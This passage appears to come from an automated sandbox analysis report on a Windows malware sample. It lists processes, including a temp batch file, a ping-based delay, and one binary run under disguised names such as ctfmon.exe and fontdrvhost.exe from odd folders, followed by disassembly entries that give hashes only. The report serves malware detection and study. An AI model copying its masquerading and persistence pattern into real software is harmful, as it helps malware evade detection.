                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:45
                                                                                                                Start time:03:17:14
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:46
                                                                                                                Start time:03:17:14
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat"
                                                                                                                Imagebase:0x7ff6629d0000
                                                                                                                File size:289'792 bytes
                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:47
                                                                                                                Start time:03:17:14
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:48
                                                                                                                Start time:03:17:16
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:chcp 65001
                                                                                                                Imagebase:0x7ff60e5d0000
                                                                                                                File size:14'848 bytes
                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:49
                                                                                                                Start time:03:17:16
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\PING.EXE
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:ping -n 10 localhost
                                                                                                                Imagebase:0x7ff7f3360000
                                                                                                                File size:22'528 bytes
                                                                                                                MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:51
                                                                                                                Start time:03:17:19
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"
                                                                                                                Imagebase:0x190000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 66%, ReversingLabs
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:52
                                                                                                                Start time:03:17:25
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                Imagebase:0x7ff717f30000
                                                                                                                File size:496'640 bytes
                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:53
                                                                                                                Start time:03:17:27
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
                                                                                                                Imagebase:0x160000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:54
                                                                                                                Start time:03:17:28
                                                                                                                Start date:18/11/2024
                                                                                                                Path:C:\Recovery\ctfmon.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Recovery\ctfmon.exe"
                                                                                                                Imagebase:0x7ff7934f0000
                                                                                                                File size:1'998'336 bytes
                                                                                                                MD5 hash:2D756772BC00E5778D794C107358DDF7
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFD348C0D78 Relevance: .3, Instructions: 254COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2396316491.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348c0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 64ef92563af64a99c8c4c59bc0aaf522861e87a3d02c238cc01de3460677e157
                                                                                                                  • Instruction ID: 58bd6c1a2f94a35665c91ca1b982a18f370d265769c877a72a7cd697b361d04e
                                                                                                                  • Opcode Fuzzy Hash: 64ef92563af64a99c8c4c59bc0aaf522861e87a3d02c238cc01de3460677e157
                                                                                                                  • Instruction Fuzzy Hash: C491A375A18A998FE799DB9888793A9BFE1FF96310F0401BFD04DD72D6CA792804C740
                                                                                                                  Function 00007FFD34CB5B36 Relevance: 2.0, Strings: 1, Instructions: 716COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: d
                                                                                                                  • API String ID: 0-2564639436
                                                                                                                  • Opcode ID: ed7130d659cfe769ab15ef45c5571767741f9856127ddbb2a95bdc27529040ca
                                                                                                                  • Instruction ID: 1384bc94506d049bab6f6e4fe4fea921862282253e7c86d890eee135a316dbdd
                                                                                                                  • Opcode Fuzzy Hash: ed7130d659cfe769ab15ef45c5571767741f9856127ddbb2a95bdc27529040ca
                                                                                                                  • Instruction Fuzzy Hash: 22322030B0CA4A4FEB98DF58C4A167AB7E1EF96304F1441BAD549C7297DE38F8528781
                                                                                                                  Function 00007FFD34CB0DA0 Relevance: 2.0, Strings: 1, Instructions: 713COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: !
                                                                                                                  • API String ID: 0-2657877971
                                                                                                                  • Opcode ID: 33b050594653fe3d2f72da326c60e43b419409f3f58e075788a3b8f23da9881c
                                                                                                                  • Instruction ID: f4d1ffcddd66b51ea311b06cbc1318bb0bb7f7996e31092440af94aa26bf42e2
                                                                                                                  • Opcode Fuzzy Hash: 33b050594653fe3d2f72da326c60e43b419409f3f58e075788a3b8f23da9881c
                                                                                                                  • Instruction Fuzzy Hash: 3932E530B0CA598FDB98DB18C8A5ABD77E2FF55310F1441BAD14EC7292DE68AC55CB80
                                                                                                                  Function 00007FFD34CBF198 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 0-3916222277
                                                                                                                  • Opcode ID: 2670a66a2df523b561cfcf0cc14182e81e9fac306f34bf62b18363e484734b14
                                                                                                                  • Instruction ID: 251ab1c7d36eaaebdc5f31b719d56e23a35691f4d5b27128d3d01684196256de
                                                                                                                  • Opcode Fuzzy Hash: 2670a66a2df523b561cfcf0cc14182e81e9fac306f34bf62b18363e484734b14
                                                                                                                  • Instruction Fuzzy Hash: 44515875E0864A9FDB59DBA8C4A56FDB7B1FF46300F1044BAC00AE7382CE786902DB40
                                                                                                                  Function 00007FFD34CBA108 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 0-3916222277
                                                                                                                  • Opcode ID: ea3b86a96466d70d8bb72992aa5413d00797f68e54600698acabc126535aa601
                                                                                                                  • Instruction ID: 66a6ce61ae16e07785e46285ed3f34fa659ab9a99ad42e8abf1ab6754a0a8149
                                                                                                                  • Opcode Fuzzy Hash: ea3b86a96466d70d8bb72992aa5413d00797f68e54600698acabc126535aa601
                                                                                                                  • Instruction Fuzzy Hash: C4517C31E0954A8FDB48DB98D4A16BDBBB1FF4A300F1041BED15EE7282CE7A6901DB41
                                                                                                                  Function 00007FFD34CB2E18 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 0-3916222277
                                                                                                                  • Opcode ID: a552357d838c0052f74427b7fe706c8785b310d818f90835a7f46d144e7006af
                                                                                                                  • Instruction ID: 7aed5b8f3789939983491af13de4f74a148dc1d2c49a43fa9bbe6aa8cf061eb9
                                                                                                                  • Opcode Fuzzy Hash: a552357d838c0052f74427b7fe706c8785b310d818f90835a7f46d144e7006af
                                                                                                                  • Instruction Fuzzy Hash: AA411770E0854A9FDB59CB94C8A45FDB7B1FF4A301F1044BAD11AEB292CE786902DB90
                                                                                                                  Function 00007FFD34CB1DE8 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 4
                                                                                                                  • API String ID: 0-4088798008
                                                                                                                  • Opcode ID: 69e9e8720cbb105c717a4d4a2caec7a8493de40812c562ba5b8054152557ad6b
                                                                                                                  • Instruction ID: 1ea7409d60a728ffee8c9eb166512920a028b4dbaae5c220814905e8a2776ae2
                                                                                                                  • Opcode Fuzzy Hash: 69e9e8720cbb105c717a4d4a2caec7a8493de40812c562ba5b8054152557ad6b
                                                                                                                  • Instruction Fuzzy Hash: B2110A53B1DD8A1FE754EAA8C8BA6A573D1FF65244F08417BD44FC3192DE28B8098380
                                                                                                                  Function 00007FFD34CB2134 Relevance: .7, Instructions: 677COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 67d200ac815a575a58ce315e1d0ee5f65552003afc05ee92793975457a31bf2d
                                                                                                                  • Instruction ID: 2e03662cc46584c0e3b352bb2bd21e6f76ae1cb4a9321bb0019140c14f5a9369
                                                                                                                  • Opcode Fuzzy Hash: 67d200ac815a575a58ce315e1d0ee5f65552003afc05ee92793975457a31bf2d
                                                                                                                  • Instruction Fuzzy Hash: E322B730B08A198FEB98DB18C8A5ABD77E2FF55310F5441BAD10EC7292DE78AC55CB50
                                                                                                                  Function 00007FFD34CBA37F Relevance: .4, Instructions: 425COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 336397ee4efe17eb106787766cc3de83603b582033b43ff847dd1f894aedecf3
                                                                                                                  • Instruction ID: 48ecf529e3a414c06a2ac66ffa18df56c042af9a8ea7b175b3cd491d9118408a
                                                                                                                  • Opcode Fuzzy Hash: 336397ee4efe17eb106787766cc3de83603b582033b43ff847dd1f894aedecf3
                                                                                                                  • Instruction Fuzzy Hash: 3FF1F5706185558FEB49CF18C0E16B83BA1FF46300B5445BEC98ACB68BDA7DF896DB40
                                                                                                                  Function 00007FFD34CBB3C1 Relevance: .4, Instructions: 409COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0747b325adf454eb6a03558f3c4fe2eda859f7960b51ae0b48ce62317b8e2e73
                                                                                                                  • Instruction ID: 2fa81ebe7ea67a28d228c2d0915a95ff1dd907d6f6b63edc061f0ae7c916f86f
                                                                                                                  • Opcode Fuzzy Hash: 0747b325adf454eb6a03558f3c4fe2eda859f7960b51ae0b48ce62317b8e2e73
                                                                                                                  • Instruction Fuzzy Hash: 2BD1DF30A0DA068FE369DB28D4E157977E1FF46300B10457FC58EC3A82EEADB8569B51
                                                                                                                  Function 00007FFD34CB308F Relevance: .4, Instructions: 375COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5b6e28a9b31f4cb99f58c2f0f159e6ead91810e55a4f1256fafe86a14f4485f0
                                                                                                                  • Instruction ID: 6b7d2352fe5aeab938890c9f52e31eadd285195cb5403f100a0b485083232016
                                                                                                                  • Opcode Fuzzy Hash: 5b6e28a9b31f4cb99f58c2f0f159e6ead91810e55a4f1256fafe86a14f4485f0
                                                                                                                  • Instruction Fuzzy Hash: 12D192306186558FEB49CF04C0E55B97BA1FF46310B5445BEC94ACB69BCABCF892CB41
                                                                                                                  Function 00007FFD34CB30AF Relevance: .3, Instructions: 334COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7ef871375479a192fc777bb8b66f491ecfb9aebcf47b2354f48d61d0cd25c267
                                                                                                                  • Instruction ID: 080607ac644f01b319c9ef272c8d30c950e9b0e80a825e8ef2f5c7824bf29231
                                                                                                                  • Opcode Fuzzy Hash: 7ef871375479a192fc777bb8b66f491ecfb9aebcf47b2354f48d61d0cd25c267
                                                                                                                  • Instruction Fuzzy Hash: EBC1A1306186568BEB09CF04C0E05B97BA1FF46310B5445BED94ACB69BCEBCF852DB41
                                                                                                                  Function 00007FFD34CBA39F Relevance: .3, Instructions: 334COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e5a73d89e60f96c0b3842f27095af23e84bf23fb0af29363a1b033379824b80a
                                                                                                                  • Instruction ID: bad6fe2d1014880ffc930fa3c78ecf8c81f2deadd55752530e605956198147ed
                                                                                                                  • Opcode Fuzzy Hash: e5a73d89e60f96c0b3842f27095af23e84bf23fb0af29363a1b033379824b80a
                                                                                                                  • Instruction Fuzzy Hash: 88C1E1706186528BEB09CF18C0E11B93BA1FF46310B5445BEC9CBCB58BDA7DE892DB40
                                                                                                                  Function 00007FFD34CB2942 Relevance: .3, Instructions: 328COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8612963f6b8bb5deda9c338d8d2d0d514d79545c7a2eda0b26eca8cf15b8daed
                                                                                                                  • Instruction ID: 3670be11f36ae812771d65585fd9a2e489129b897a92b2559ad851e310bee6e4
                                                                                                                  • Opcode Fuzzy Hash: 8612963f6b8bb5deda9c338d8d2d0d514d79545c7a2eda0b26eca8cf15b8daed
                                                                                                                  • Instruction Fuzzy Hash: D7C1C030B18A468FE749DF58C0A56A8B7A1FF5A300F5441BAC14EC7A86DF78B861D7D0
                                                                                                                  Function 00007FFD34CBC687 Relevance: .3, Instructions: 304COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 15af6b4f74a45f1085661b1679ba56d60e809f8a45970bdfabe7e29c9a0fd334
                                                                                                                  • Instruction ID: 3294a1ea0ef62b9f47a7e79018280742866685145f1ef41cab270d4f8d8ee730
                                                                                                                  • Opcode Fuzzy Hash: 15af6b4f74a45f1085661b1679ba56d60e809f8a45970bdfabe7e29c9a0fd334
                                                                                                                  • Instruction Fuzzy Hash: 2621B112F0C1978AF66566A928B50FD27909F82320F18157FD68DEA4C3DCDE7C617392
                                                                                                                  Function 00007FFD34CB02B9 Relevance: .3, Instructions: 301COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c3088f6aaf30f11ce2d4fca04819603c916a8a14883ac554b62c61a4c5381de8
                                                                                                                  • Instruction ID: 65f0b1fa7c6b91ea64ff43e93b7b65ab8594f1169418cc3dbdd0e2fa4e7ed210
                                                                                                                  • Opcode Fuzzy Hash: c3088f6aaf30f11ce2d4fca04819603c916a8a14883ac554b62c61a4c5381de8
                                                                                                                  • Instruction Fuzzy Hash: E9914B35B0C6494FE764EA1894BA5FD37D0EF46320B0402BBD28EC75A3ED5CA8269781
                                                                                                                  Function 00007FFD34CB8C4A Relevance: .3, Instructions: 290COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 11874d93f03d6f5b6cdffa79975a454a38e6f908191d2bae2de743119012ff69
                                                                                                                  • Instruction ID: 8f91c6ee90cb07c94a5382163b5e298cb573d0de72df4721ab56e4d4d5b71540
                                                                                                                  • Opcode Fuzzy Hash: 11874d93f03d6f5b6cdffa79975a454a38e6f908191d2bae2de743119012ff69
                                                                                                                  • Instruction Fuzzy Hash: 88A10430A0DA468FE749EB68D4A15A8B7E1FF16310F5441BAC14EC7683DE6CB861D790
                                                                                                                  Function 00007FFD34CBC339 Relevance: .3, Instructions: 289COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 42f44bd46a357e5279fc959607cbf155d6c95e803782f357eca26956c85d15fc
                                                                                                                  • Instruction ID: 06b2d63d239f98113892c3132a46f66169b83fd982bc37225cc1469e5b2d0865
                                                                                                                  • Opcode Fuzzy Hash: 42f44bd46a357e5279fc959607cbf155d6c95e803782f357eca26956c85d15fc
                                                                                                                  • Instruction Fuzzy Hash: DE914731B0C5494FE768DA1884B61BD37C0FF86310B0402BFD29EC75A6DE6CAD269B81
                                                                                                                  Function 00007FFD34CB7644 Relevance: .3, Instructions: 286COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bc6be32531c884e55fd1c7314e8c81668993095652b9ff2c3695ef218fbe4343
                                                                                                                  • Instruction ID: 4e3de62a35d82ad00a7ee50ddd07442fdc86cfeea21d9cd07467962270984627
                                                                                                                  • Opcode Fuzzy Hash: bc6be32531c884e55fd1c7314e8c81668993095652b9ff2c3695ef218fbe4343
                                                                                                                  • Instruction Fuzzy Hash: 7F218112F4F1878AE779566818F51BC7A805F53351F1901BBDE8EE62C2DDCE2860F292
                                                                                                                  Function 00007FFD34CBE1F6 Relevance: .3, Instructions: 265COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4c105f9532dc9bdd64f0f846b0afbc48b087e3616ced84784b5bd9a234861b0c
                                                                                                                  • Instruction ID: b11429c1a7ba0242c7aefddce31e8cf9b3d2fa6553ff398194bb392dae4e5b3f
                                                                                                                  • Opcode Fuzzy Hash: 4c105f9532dc9bdd64f0f846b0afbc48b087e3616ced84784b5bd9a234861b0c
                                                                                                                  • Instruction Fuzzy Hash: AD812431B0CB464FE36C9A5894A117D7BE0EF87710B14057FD58EC3282DE6DB812A782
                                                                                                                  Function 00007FFD34CB3019 Relevance: .3, Instructions: 256COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 82beea26741aaaf63f63f81c537db9b0913896e291b527bd14b741b29d79239a
                                                                                                                  • Instruction ID: 8fba2ac5a6ecdcc294f0f0d0775c1e9e10f7ade6441ccb6c04230013da079e98
                                                                                                                  • Opcode Fuzzy Hash: 82beea26741aaaf63f63f81c537db9b0913896e291b527bd14b741b29d79239a
                                                                                                                  • Instruction Fuzzy Hash: 79713531A0DB424FE7689A2894E5479BBE4EF93310B14057FD58FC3293DD6DB8129B42
                                                                                                                  Function 00007FFD34CBECC2 Relevance: .2, Instructions: 243COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2401565704.00007FFD34CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34CB0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34cb0000_LzmJLVB41K.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7bb638891cd312c7875c2da61c46475a3645490c592a1673142be4cb033e904d
                                                                                                                  • Instruction ID: 6092969d8f196e146365e4967b0d921d61e1ba60fbc1368466cc194d93484142
                                                                                                                  • Opcode Fuzzy Hash: 7bb638891cd312c7875c2da61c46475a3645490c592a1673142be4cb033e904d
